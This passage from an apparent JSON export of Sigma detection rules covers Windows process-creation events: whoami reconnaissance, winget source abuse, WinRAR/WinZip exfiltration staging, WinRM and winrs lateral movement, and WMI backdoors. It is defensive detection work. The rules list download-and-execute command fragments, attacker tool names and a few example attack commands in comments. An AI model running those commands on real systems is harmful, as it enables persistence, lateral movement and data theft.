    "content": "title: Whoami.EXE Execution From Privileged Process\nid: 79ce34ca-af29-4d0e-b832-fc1b377020db\nrelated:\n    - id: 80167ada-7a12-41ed-b8e9-aa47195c66a1\n      type: obsolete\nstatus: test\ndescription: Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n    - https://web.archive.org/web/20221019044836/https://nsudo.m2team.org/en-us/\nauthor: Florian Roth (Nextron Systems), Teymur Kheirkhabarov\ndate: 2022-01-28\nmodified: 2023-12-04\ntags:\n    - attack.privilege-escalation\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'whoami.exe'\n        - Image|endswith: '\\whoami.exe'\n    selection_user:\n        User|contains:\n            - 'AUTHORI'\n            - 'AUTORI'\n            - 'TrustedInstaller'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_whoami_groups_discovery.yml",
    "content": "title: Group Membership Reconnaissance Via Whoami.EXE\nid: bd8b828d-0dca-48e1-8a63-8a58ecf2644f\nstatus: test\ndescription: Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-28\ntags:\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\whoami.exe'\n        - OriginalFileName: 'whoami.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' /groups'\n            - ' -groups'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_whoami_output.yml",
    "content": "title: Whoami.EXE Execution With Output Option\nid: c30fb093-1109-4dc8-88a8-b30d11c95a5d\nstatus: test\ndescription: Detects the execution of \"whoami.exe\" with the \"/FO\" flag to choose CSV as output format or with redirection options to export the results to a file for later use.\nreferences:\n    - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/\n    - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/\n    - https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-28\nmodified: 2023-12-04\ntags:\n    - attack.discovery\n    - attack.t1033\n    - car.2016-03-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_main_img:\n        - Image|endswith: '\\whoami.exe'\n        - OriginalFileName: 'whoami.exe'\n    selection_main_cli:\n        CommandLine|contains:\n            - ' /FO CSV'\n            - ' -FO CSV'\n    selection_special:\n        CommandLine|contains: 'whoami*>'\n    condition: all of selection_main_* or selection_special\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_whoami_parent_anomaly.yml",
    "content": "title: Whoami.EXE Execution Anomaly\nid: 8de1cbe8-d6f5-496d-8237-5f44a721c7a0\nstatus: test\ndescription: Detects the execution of whoami.exe with suspicious parent processes.\nreferences:\n    - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/\n    - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/\n    - https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-08-12\nmodified: 2025-03-06\ntags:\n    - attack.discovery\n    - attack.t1033\n    - car.2016-03-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\whoami.exe'\n        - OriginalFileName: 'whoami.exe'\n    filter_main_known_parents:\n        # This list can be any legitimate shell or application that you expect whoami to run from\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\powershell_ise.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n    filter_optional_ms_monitoring_agent:\n        ParentImage|endswith: ':\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe'\n    filter_main_parent_null:\n        ParentImage: null\n    filter_main_parent_empty:\n        ParentImage:\n            - ''\n            - '-'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Admin activity\n    - Scripts and administrative tools used in the monitored environment\n    - Monitoring activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_whoami_priv_discovery.yml",
    "content": "title: Security Privileges Enumeration Via Whoami.EXE\nid: 97a80ec7-0e2f-4d05-9ef4-65760e634f6b\nstatus: test\ndescription: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/whoami\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-05-05\nmodified: 2023-02-28\ntags:\n    - attack.privilege-escalation\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\whoami.exe'\n        - OriginalFileName: 'whoami.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' /priv'\n            - ' -priv'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml",
    "content": "title: Suspicious WindowsTerminal Child Processes\nid: 8de89e52-f6e1-4b5b-afd1-41ecfa300d48\nstatus: test\ndescription: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)\nreferences:\n    - https://persistence-info.github.io/Data/windowsterminalprofile.html\n    - https://twitter.com/nas_bench/status/1550836225652686848\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-25\nmodified: 2023-02-14\ntags:\n    - attack.execution\n    - attack.persistence\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            - '\\WindowsTerminal.exe'\n            - '\\wt.exe'\n    selection_susp:\n        - Image|endswith:\n              # Add more LOLBINS\n              - '\\rundll32.exe'\n              - '\\regsvr32.exe'\n              - '\\certutil.exe'\n              - '\\cscript.exe'\n              - '\\wscript.exe'\n              - '\\csc.exe'\n        - Image|contains:\n              # Add more suspicious paths\n              - 'C:\\Users\\Public\\'\n              - '\\Downloads\\'\n              - '\\Desktop\\'\n              - '\\AppData\\Local\\Temp\\'\n              - '\\Windows\\TEMP\\'\n        - CommandLine|contains:\n              # Add more suspicious commandline\n              - ' iex '\n              - ' icm'\n              - 'Invoke-'\n              - 'Import-Module '\n              - 'ipmo '\n              - 'DownloadString('\n              - ' /c '\n              - ' /k '\n              - ' /r '\n    filter_builtin_visual_studio_shell:\n        CommandLine|contains|all:\n            - 'Import-Module'\n            - 'Microsoft.VisualStudio.DevShell.dll'\n            - 'Enter-VsDevShell'\n    filter_open_settings:\n        CommandLine|contains|all:\n            - '\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_'\n            - '\\LocalState\\settings.json'\n    filter_vsdevcmd:\n        CommandLine|contains|all:\n            - 'C:\\Program Files\\Microsoft Visual Studio\\'\n            - '\\Common7\\Tools\\VsDevCmd.bat'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Other legitimate \"Windows Terminal\" profiles\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winget_add_custom_source.yml",
    "content": "title: Add New Download Source To Winget\nid: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842\nrelated:\n    - id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2\n      type: similar\n    - id: c15a46a0-07d4-4c87-b4b6-89207835a83b\n      type: similar\nstatus: test\ndescription: Detects usage of winget to add additional download sources\nreferences:\n    - https://learn.microsoft.com/en-us/windows/package-manager/winget/source\n    - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-17\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\winget.exe'\n        - OriginalFileName: 'winget.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'source '\n            - 'add '\n    condition: all of selection_*\nfalsepositives:\n    - False positives are expected with legitimate sources\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml",
    "content": "title: Add Insecure Download Source To Winget\nid: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2\nrelated:\n    - id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842\n      type: similar\n    - id: c15a46a0-07d4-4c87-b4b6-89207835a83b\n      type: similar\nstatus: test\ndescription: |\n    Detects usage of winget to add a new insecure (http) download source.\n    Winget will not allow the addition of insecure sources, hence this could indicate potentially suspicious activity (or typos)\nreferences:\n    - https://learn.microsoft.com/en-us/windows/package-manager/winget/source\n    - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-17\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\winget.exe'\n        - OriginalFileName: 'winget.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'source '\n            - 'add '\n            - 'http://'\n    condition: all of selection_*\nfalsepositives:\n    - False positives might occur if the users are unaware of such control checks\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winget_add_susp_custom_source.yml",
    "content": "title: Add Potential Suspicious New Download Source To Winget\nid: c15a46a0-07d4-4c87-b4b6-89207835a83b\nrelated:\n    - id: 05ebafc8-7aa2-4bcd-a269-2aec93f9e842\n      type: similar\n    - id: 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2\n      type: similar\nstatus: test\ndescription: Detects usage of winget to add new potentially suspicious download sources\nreferences:\n    - https://learn.microsoft.com/en-us/windows/package-manager/winget/source\n    - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-17\nmodified: 2023-12-04\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\winget.exe'\n        - OriginalFileName: 'winget.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'source '\n            - 'add '\n    selection_source_direct_ip:\n        # This is a best effort. A better way to handle this is to limit it via whitelist. Check Group Policy for more details\n        CommandLine|re: '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml",
    "content": "title: Install New Package Via Winget Local Manifest\nid: 313d6012-51a0-4d93-8dfc-de8553239e25\nstatus: test\ndescription: |\n    Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them.\n    The manifest option enables you to install an application by passing in a YAML file directly to the client.\n    Winget can be used to download and install exe, msi or msix files later.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/package-manager/winget/install#local-install\n    - https://lolbas-project.github.io/lolbas/Binaries/Winget/\n    - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget\nauthor: Sreeman, Florian Roth (Nextron Systems), frack113\ndate: 2020-04-21\nmodified: 2023-04-17\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\winget.exe'\n        - OriginalFileName: 'winget.exe'\n    selection_install_flag:\n        CommandLine|contains:\n            - 'install'\n            - ' add ' # https://github.com/microsoft/winget-cli/blob/02d2f93807c9851d73eaacb4d8811a76b64b7b01/src/AppInstallerCLICore/Commands/InstallCommand.h\n    selection_manifest_flag:\n        CommandLine|contains:\n            - '-m '\n            - '--manifest'\n    condition: all of selection_*\nfalsepositives:\n    - Some false positives are expected in environments that use this functionality to install and test their custom applications\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml",
    "content": "title: Winrar Compressing Dump Files\nid: 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc\nrelated:\n    - id: ec570e53-4c76-45a9-804d-dc3f355ff7a7\n      type: similar\nstatus: test\ndescription: Detects execution of WinRAR in order to compress a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration.\nreferences:\n    - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-04\nmodified: 2023-09-12\ntags:\n    - attack.collection\n    - attack.t1560.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\rar.exe'\n              - '\\winrar.exe'\n        - Description: 'Command line RAR'\n    selection_extension:\n        CommandLine|contains:\n            - '.dmp'\n            - '.dump'\n            - '.hdmp'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of WinRAR with a command line in which \".dmp\" or \".dump\" appears accidentally\n    - Legitimate use of WinRAR to compress WER \".dmp\" files for troubleshooting\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winrar_susp_child_process.yml",
    "content": "title: Potentially Suspicious Child Process Of WinRAR.EXE\nid: 146aace8-9bd6-42ba-be7a-0070d8027b76\nrelated:\n    - id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343\n      type: similar\nstatus: test\ndescription: Detects potentially suspicious child processes of WinRAR.exe.\nreferences:\n    - https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\n    - https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-31\ntags:\n    - attack.execution\n    - attack.t1203\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\WinRAR.exe'\n    selection_binaries:\n        # Note: add additional binaries that the attacker might use\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\cscript.exe'\n              - '\\mshta.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\wscript.exe'\n        - OriginalFileName:\n              - 'Cmd.Exe'\n              - 'cscript.exe'\n              - 'mshta.exe'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'regsvr32.exe'\n              - 'RUNDLL32.EXE'\n              - 'wscript.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml",
    "content": "title: WinRAR Execution in Non-Standard Folder\nid: 4ede543c-e098-43d9-a28f-dd784a13132f\nstatus: test\ndescription: Detects a suspicious WinRAR execution in a folder which is not the default installation folder\nreferences:\n    - https://twitter.com/cyb3rops/status/1460978167628406785\nauthor: Florian Roth (Nextron Systems), Tigzy\ndate: 2021-11-17\nmodified: 2025-07-16\ntags:\n    - attack.collection\n    - attack.t1560.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith:\n              - '\\rar.exe'\n              - '\\winrar.exe'\n        - Description:\n              - 'Command line RAR'\n              - 'WinRAR'\n    filter_main_unrar:\n        # Note: we filter unrar as it has the same description as the other utilities, and we're only interested in compression\n        Image|endswith: '\\UnRAR.exe'\n    filter_main_path:\n        Image|contains:\n            - ':\\Program Files (x86)\\WinRAR\\'\n            - ':\\Program Files\\WinRAR\\'\n    filter_optional_temp:\n        # Note: in some occasion installers were seen dropping \"rar\" in TEMP\n        Image|contains: ':\\Windows\\Temp\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate use of WinRAR in a folder of a software that bundles WinRAR\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml",
    "content": "title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl\nid: 074e0ded-6ced-4ebd-8b4d-53f55908119d\nstatus: test\ndescription: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)\nreferences:\n    - https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404\nauthor: Julia Fomina, oscd.community\ndate: 2020-10-06\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    contains_format_pretty_arg:\n        CommandLine|contains:\n            - 'format:pretty'\n            - 'format:\"pretty\"'\n            - 'format:\"text\"'\n            - 'format:text'\n    image_from_system_folder:\n        Image|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    contains_winrm:\n        CommandLine|contains: 'winrm'\n    condition: contains_winrm and (contains_format_pretty_arg and not image_from_system_folder)\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml",
    "content": "title: Remote Code Execute via Winrm.vbs\nid: 9df0dd3a-1a5c-47e3-a2bc-30ed177646a0\nstatus: test\ndescription: Detects an attempt to execute code or create service on remote host via winrm.vbs.\nreferences:\n    - https://twitter.com/bohops/status/994405551751815170\n    - https://redcanary.com/blog/lateral-movement-winrm-wmi/\n    - https://lolbas-project.github.io/lolbas/Scripts/Winrm/\nauthor: Julia Fomina, oscd.community\ndate: 2020-10-07\nmodified: 2023-03-03\ntags:\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        # Note: winrm.vbs can only be run by a process named cscript (see \"IsCScriptEnv\" function)\n        - Image|endswith: '\\cscript.exe'\n        - OriginalFileName: 'cscript.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'winrm'\n            - 'invoke Create wmicimv2/Win32_'\n            - '-r:http'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml",
    "content": "title: Remote PowerShell Session Host Process (WinRM)\nid: 734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8\nstatus: test\ndescription: Detects remote PowerShell sessions by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-09-12\nmodified: 2022-10-09\ntags:\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1059.001\n    - attack.t1021.006\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\wsmprovhost.exe'\n        - ParentImage|endswith: '\\wsmprovhost.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of remote Powershell, e.g. for monitoring purposes.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winrm_susp_child_process.yml",
    "content": "title: Suspicious Processes Spawned by WinRM\nid: 5cc2cda8-f261-4d88-a2de-e9e193c86716\nstatus: test\ndescription: Detects suspicious processes, including shells, spawned from the WinRM host process\nauthor: Andreas Hunkeler (@Karneades), Markus Neis\nreferences:\n    - Internal Research\ndate: 2021-05-20\nmodified: 2022-07-14\ntags:\n    - attack.t1190\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\wsmprovhost.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\sh.exe'\n            - '\\bash.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wsl.exe'\n            - '\\schtasks.exe'\n            - '\\certutil.exe'\n            - '\\whoami.exe'\n            - '\\bitsadmin.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate WinRM usage\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winrs_local_command_execution.yml",
    "content": "title: Winrs Local Command Execution\nid: bcfece3d-56fe-4545-9931-3b8e92927db1\nstatus: experimental\ndescription: |\n    Detects the execution of Winrs.exe where it is used to execute commands locally.\n    Commands executed this way are launched under Winrshost.exe and can represent proxy execution used for defense evasion or lateral movement.\nreferences:\n    - https://cardinalops.com/blog/living-off-winrm-abusing-complexity-in-remote-management/\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/winrs\nauthor: Liran Ravich, Nasreddine Bencherchali\ndate: 2025-10-22\ntags:\n    - attack.lateral-movement\n    - attack.defense-evasion\n    - attack.t1021.006\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        # Note: Example of command to simulate (winrm needs to be enabled): \"c:\\Windows\\System32\\winrs.exe\" calc.exe\n        - Image|endswith: '\\winrs.exe'\n        - OriginalFileName: 'winrs.exe'\n    selection_local_ip:\n        CommandLine|contains|windash:\n            - '/r:localhost'\n            - '/r:127.0.0.1'\n            - '/r:[::1]'\n            - '/remote:localhost'\n            - '/remote:127.0.0.1'\n            - '/remote:[::1]'\n    filter_main_remote:\n        CommandLine|contains|windash:\n            - \"/r:\"\n            - \"/remote:\"\n    condition: all of selection_* or (selection_img and not 1 of filter_main_*)\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winrshost_command_execution.yml",
    "content": "title: Potential Lateral Movement via Windows Remote Shell\nid: 79df3f68-dccb-48e9-9171-b75cbc37c51d\nstatus: experimental\ndescription: |\n    Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity.\nreferences:\n    - https://cardinalops.com/blog/living-off-winrm-abusing-complexity-in-remote-management/\n    - https://www.ired.team/offensive-security/lateral-movement/winrs-for-lateral-movement\nauthor: Liran Ravich\ndate: 2025-10-22\ntags:\n    - attack.lateral-movement\n    - attack.t1021.006\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Note: Example of command to simulate (winrm needs to be enabled): \"c:\\Windows\\System32\\winrs.exe\" powershell\n        ParentImage|endswith: '\\winrshost.exe'\n    filter_main_conhost:\n        Image: 'C:\\Windows\\System32\\conhost.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate use of WinRM within the organization\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_winzip_password_compression.yml",
    "content": "title: Compress Data and Lock With Password for Exfiltration With WINZIP\nid: e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d\nstatus: test\ndescription: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md\nauthor: frack113\ndate: 2021-07-27\nmodified: 2022-12-25\ntags:\n    - attack.collection\n    - attack.t1560.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_winzip:\n        CommandLine|contains:\n            - 'winzip.exe'\n            - 'winzip64.exe'\n    selection_password:\n        CommandLine|contains: '-s\"'\n    selection_other:\n        CommandLine|contains:\n            - ' -min '\n            - ' -a '\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wlrmdr_uncommon_child_process.yml",
    "content": "title: Wlrmdr.EXE Uncommon Argument Or Child Process\nid: 9cfc00b6-bfb7-49ce-9781-ef78503154bb\nstatus: experimental\ndescription: |\n    Detects the execution of \"Wlrmdr.exe\" with the \"-u\" command line flag, which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries.\n    This detection also focuses on any uncommon child processes spawned from \"Wlrmdr.exe\" as a supplement for those that possess \"ParentImage\" telemetry.\nreferences:\n    - https://twitter.com/0gtweet/status/1493963591745220608?s=20&t=xUg9DsZhJy1q9bPTUWgeIQ\n    - https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/\nauthor: frack113, manasmbellani\ndate: 2022-02-16\nmodified: 2025-10-31\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent: # This selection is looking for processes spawned from wlrmdr using the \"-u\" flag\n        ParentImage|endswith: '\\wlrmdr.exe'\n    selection_child_img:\n        - Image|endswith: '\\wlrmdr.exe'\n        - OriginalFileName: 'WLRMNDR.EXE'\n    selection_child_cli_flags_s:\n        CommandLine|contains|windash: '-s '\n    selection_child_cli_flags_f:\n        CommandLine|contains|windash: '-f '\n    selection_child_cli_flags_t:\n        CommandLine|contains|windash: '-t '\n    selection_child_cli_flags_m:\n        CommandLine|contains|windash: '-m '\n    selection_child_cli_flags_a:\n        CommandLine|contains|windash: '-a '\n    selection_child_cli_flags_u:\n        CommandLine|contains|windash: '-u '\n    filter_main_winlogon:\n        ParentImage: 'C:\\Windows\\System32\\winlogon.exe'\n    filter_main_empty:\n        ParentImage:\n            - ''\n            - '-'\n    filter_main_null:\n        ParentImage: null\n    condition: selection_parent or (all of selection_child_* and not 1 of filter_main_*)\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml",
    "content": "title: WMI Backdoor Exchange Transport Agent\nid: 797011dc-44f4-4e6f-9f10-a8ceefbe566b\nstatus: test\ndescription: Detects a WMI backdoor in Exchange Transport Agents via WMI event filters\nreferences:\n    - https://twitter.com/cglyer/status/1182389676876980224\n    - https://twitter.com/cglyer/status/1182391019633029120\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-10-11\nmodified: 2023-02-08\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\EdgeTransport.exe'\n    filter_conhost:\n        Image: 'C:\\Windows\\System32\\conhost.exe'\n    filter_oleconverter:  # FP also documented in https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=18\n        Image|startswith: 'C:\\Program Files\\Microsoft\\Exchange Server\\'\n        Image|endswith: '\\Bin\\OleConverter.exe'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmi_password_never_expire.yml",
    "content": "title: Password Set to Never Expire via WMI\nid: 7864a175-3654-4824-9f0d-f0da18ab27c0\nstatus: experimental\ndescription: |\n    Detects the use of wmic.exe to modify user account settings and explicitly disable password expiration.\nreferences:\n    - https://www.huntress.com/blog/the-unwanted-guest\nauthor: \"Daniel Koifman (KoifSec)\"\ndate: 2025-07-30\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1047\n    - attack.t1098\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:   # Example command simulated:  wmic  useraccount where name='guest' set passwordexpires=false\n        - Image|endswith: '\\wmic.exe'\n        - OriginalFileName: 'wmic.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'useraccount'\n            - ' set '\n            - 'passwordexpires'\n            - 'false'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml",
    "content": "title: WMI Persistence - Script Event Consumer\nid: ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e\nstatus: test\ndescription: Detects WMI script event consumers\nreferences:\n    - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/\nauthor: Thomas Patzke\ndate: 2018-03-07\nmodified: 2022-10-11\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image: C:\\WINDOWS\\system32\\wbem\\scrcons.exe\n        ParentImage: C:\\Windows\\System32\\svchost.exe\n    condition: selection\nfalsepositives:\n    - Legitimate event consumers\n    - Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml",
